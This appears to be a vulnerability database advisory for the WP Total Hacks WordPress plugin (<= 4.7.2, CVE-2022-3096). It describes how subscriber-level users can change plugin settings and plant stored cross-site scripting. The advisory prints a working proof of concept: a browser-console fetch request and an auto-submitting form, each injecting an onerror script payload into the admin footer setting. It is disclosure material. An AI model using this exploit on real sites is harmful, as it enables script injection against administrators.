Lucene search
Daniel RufWPEX-ID:46996537-A874-4B2E-9CD7-7D0832F9704DHistoryOct 10, 2022 - 12:00 a.m.
WP Total Hacks <= 4.7.2 - Subscriber+ Arbitrary Options Update to Stored XSS
2022-10-1000:00:00
Daniel Ruf
56
wp total hacks
stored xss
security vulnerability
arbitrary options update
EPSS
0.001
Percentile
24.8%
The plugin does not prevent low privilege users from modifying the plugin’s settings. This could allow users such as subscribers to perform Stored Cross-Site Scripting attacks against other users, like administrators, due to the lack of sanitisation and escaping as well.
Run the below command in the developer console of the web browser while being on the blog as a subscriber user
await fetch("/wp-admin/", {
"credentials": "include",
"body": "wpbiz-nonce=aaa&tabid=total-hacks-admin&wfb_favicon=&wfb_admin_favicon=&wfb_apple_icon=&wfb_remove_xmlrpc=&wfb_hide_version=&wfb_remove_more=&wfb_remove_excerpt=&wfb_disallow_pingback=&wfb_google_analytics=wwwww&wfb_google=ttttt&wfb_bing=&wfb_revision=&wfb_selfping=&wfb_pageexcerpt=&wfb_createpagefordraft=&wfb_custom_logo=&wfb_admin_footer_text=<img src=x onerror=alert(1)>&wfb_login_logo=&wfb_login_url=&wfb_login_title=&wfb_shortcode=&wfb_oembed=&wfb_webmaster=&wfb_sendername=&wfb_emailaddress=&wfb_update_notification=&submit=%C3%84nderungen+speichern",
"method": "POST",
"mode": "cors"
});
<form id="test" action="https://example.com/wp-admin/" method="post">
<input type="text" name="wpbiz-nonce" value="aaa">
<input type="text" name="tabid" value="total-hacks-admin">
<input type="text" name="wfb_favicon" value="">
<input type="text" name="wfb_admin_favicon" value="">
<input type="text" name="wfb_apple_icon" value="">
<input type="text" name="wfb_remove_xmlrpc" value="">
<input type="text" name="wfb_hide_version" value="">
<input type="text" name="wfb_remove_more" value="">
<input type="text" name="wfb_remove_excerpt" value="">
<input type="text" name="wfb_disallow_pingback" value="">
<input type="text" name="wfb_google_analytics" value="wwwww">
<input type="text" name="wfb_google" value="ttttt">
<input type="text" name="wfb_bing" value="">
<input type="text" name="wfb_revision" value="">
<input type="text" name="wfb_selfping" value="">
<input type="text" name="wfb_pageexcerpt" value="">
<input type="text" name="wfb_createpagefordraft" value="">
<input type="text" name="wfb_custom_logo" value="">
<input type="text" name="wfb_admin_footer_text" value="<img src=x onerror=alert(1)>">
<input type="text" name="wfb_login_logo" value="">
<input type="text" name="wfb_login_url" value="">
<input type="text" name="wfb_login_title" value="">
<input type="text" name="wfb_shortcode" value="">
<input type="text" name="wfb_oembed" value="">
<input type="text" name="wfb_webmaster" value="">
<input type="text" name="wfb_sendername" value="">
<input type="text" name="wfb_emailaddress" value="">
<input type="text" name="wfb_update_notification" value="">
</form>
<script>
document.getElementById("test").submit();
</script>Related
prion
prion
Cross site scripting
2022-10-31 16:15:00
nvd
nvd
CVE-2022-3096
2022-10-31 16:15:10
patchstack
patchstack
cve
cve
CVE-2022-3096
2022-10-31 16:15:10
cvelist
cvelist
wpvulndb
wpvulndb
WP Total Hacks <= 4.7.2 - Subscriber+ Arbitrary Options Update to Stored XSS
2022-10-10 00:00:00